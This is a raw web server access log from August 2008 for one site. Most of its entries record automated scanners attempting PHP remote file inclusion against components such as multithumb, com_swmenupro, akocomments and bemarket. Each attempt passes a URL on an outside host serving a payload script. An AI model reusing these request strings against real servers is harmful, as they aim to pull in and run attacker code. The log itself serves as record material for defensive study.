217.18.75.8 - - [07/Aug/2008:10:51:22 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://manga-scan.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.75.8 - - [07/Aug/2008:10:51:22 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://manga-scan.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.39.71 - - [07/Aug/2008:10:51:22 -0700] "GET /logs/access_080309.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:10:51:26 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:10:51:32 -0700] "GET /?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18391 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:10:51:33 -0700] "GET /logs/?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 59568 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:10:51:44 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:10:51:44 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:10:51:44 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.18.75.8 - - [07/Aug/2008:10:51:50 -0700] "GET /logs/access_071230.log//bemarket/postscript/postscript.php?p_mode=http://manga-scan.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:10:52:08 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:10:52:43 -0700] "GET /logs/access_080324.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.178 - - [07/Aug/2008:10:52:48 -0700] "GET /?show=slide&pageid=159&nggpage=3 HTTP/1.0" 200 37817 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.165.253.72 - - [07/Aug/2008:10:53:27 -0700] "GET /logs/access_080110.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [07/Aug/2008:10:53:27 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [07/Aug/2008:10:53:27 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [07/Aug/2008:10:53:36 -0700] "GET /logs/access_080110.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [07/Aug/2008:10:53:36 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [07/Aug/2008:10:53:36 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.97 - - [07/Aug/2008:10:53:59 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:10:54:03 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.97 - - [07/Aug/2008:10:54:03 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:10:54:03 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:10:54:03 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.56.11 - - [07/Aug/2008:10:54:05 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.11 - - [07/Aug/2008:10:54:05 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
64.26.63.13 - - [07/Aug/2008:10:54:06 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.193.201.57 - - [07/Aug/2008:10:54:15 -0700] "GET /logs/access_080118.log///squirrelcart/cart_content.php?cart_isp_root=http://www.geocities.com/wedangrondo/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:54:24 -0700] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:54:24 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:54:24 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:54:30 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:54:31 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:54:32 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:54:32 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:10:54:32 -0700] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:10:54:35 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [07/Aug/2008:10:54:39 -0700] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [07/Aug/2008:10:54:40 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [07/Aug/2008:10:54:40 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:10:54:52 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [07/Aug/2008:10:54:56 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [07/Aug/2008:10:54:57 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [07/Aug/2008:10:54:57 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [07/Aug/2008:10:54:57 -0700] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [07/Aug/2008:10:54:58 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.218.2 - - [07/Aug/2008:10:55:40 -0700] "GET /logs/access_080103.log%20//akocomments.php?mosConfig_absolute_path=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:55:53 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.56.11 - - [07/Aug/2008:10:56:17 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.11 - - [07/Aug/2008:10:56:17 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:10:56:19 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:10:56:19 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.221.182 - - [07/Aug/2008:10:56:25 -0700] "GET /logs//errors.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.13.221.182 - - [07/Aug/2008:10:56:25 -0700] "GET //errors.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:10:56:37 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:10:56:37 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:10:56:38 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:10:56:38 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [07/Aug/2008:10:56:45 -0700] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [07/Aug/2008:10:56:49 -0700] "GET /logs/access_080122.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:10:57:12 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.6 - - [07/Aug/2008:10:57:12 -0700] "GET /logs/access_080127.log%20//bemarket/postscript/postscript.php?p_mode=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.169.46.98 - - [07/Aug/2008:10:57:12 -0700] "GET /logs/access_080127.log%20/bemarket/postscript/postscript.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
69.94.56.11 - - [07/Aug/2008:10:57:22 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.11 - - [07/Aug/2008:10:57:22 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
62.44.72.170 - - [07/Aug/2008:10:57:43 -0700] "GET /logs/access_080321.log//index.php?option=com_custompages&cpage=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [07/Aug/2008:10:57:45 -0700] "GET //index.php?option=com_custompages&cpage=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 18557 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [07/Aug/2008:10:57:46 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.39.5.203 - - [07/Aug/2008:10:58:11 -0700] "GET //skin/zero_vote/error.php?dir=http://dsvv.org/dsvv/user_file/iblees/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:10:58:13 -0700] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:10:58:13 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:10:58:13 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:10:58:15 -0700] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:10:58:15 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:10:58:15 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:10:58:23 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:10:58:25 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:10:58:51 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_25/ HTTP/1.0" 200 8649 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
147.144.1.212 - - [07/Aug/2008:10:58:51 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
147.144.1.212 - - [07/Aug/2008:10:58:51 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
147.144.1.212 - - [07/Aug/2008:10:58:51 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
147.144.1.212 - - [07/Aug/2008:10:58:51 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.22.204.97 - - [07/Aug/2008:10:58:59 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.97 - - [07/Aug/2008:10:58:59 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.22.87.132 - - [07/Aug/2008:10:59:27 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/idN.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.87.132 - - [07/Aug/2008:10:59:27 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/idN.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.87.132 - - [07/Aug/2008:10:59:28 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/idN.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.87.132 - - [07/Aug/2008:10:59:28 -0700] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/idN.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.97 - - [07/Aug/2008:10:59:30 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.97 - - [07/Aug/2008:10:59:30 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:59:34 -0700] "GET /logs/?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 59568 "-" "libwww-perl/5.65" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:10:59:40 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:10:59:40 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:10:59:40 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:10:59:41 -0700] "GET /?sourcedir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18391 "-" "libwww-perl/5.65" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:10:59:41 -0700] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.110.50.111 - - [07/Aug/2008:11:00:02 -0700] "GET /logs/phphtml.php?htmlclass_path=http://monjali.athost.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.110.50.111 - - [07/Aug/2008:11:00:03 -0700] "GET /phphtml.php?htmlclass_path=http://monjali.athost.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.131.35 - - [07/Aug/2008:11:00:28 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.131.35 - - [07/Aug/2008:11:00:28 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.131.35 - - [07/Aug/2008:11:00:29 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:11:00:42 -0700] "GET /logs//login.php?dir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:00:42 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:11:00:43 -0700] "GET //login.php?dir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:00:43 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:00:43 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:11:00:44 -0700] "GET /logs/access_080110.log//login.php?dir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:11:00:44 -0700] "GET /logs/access_080126.log//login.php?dir=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:01:06 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.222.131.35 - - [07/Aug/2008:11:01:08 -0700] "GET /logs/access_080324.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:01:10 -0700] "GET /logs/access_080213.log//OPS.php?path_to_templates=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:01:10 -0700] "GET //OPS.php?path_to_templates=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:01:11 -0700] "GET /logs//OPS.php?path_to_templates=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:01:13 -0700] "GET /logs/access_080213.log//OPS.php?path_to_templates=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:01:14 -0700] "GET //OPS.php?path_to_templates=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:01:14 -0700] "GET /logs//OPS.php?path_to_templates=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [07/Aug/2008:11:01:17 -0700] "GET /logs/access_080213.log//OPS.php?path_to_templates=http://www.wvwclassof95.net/photos/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
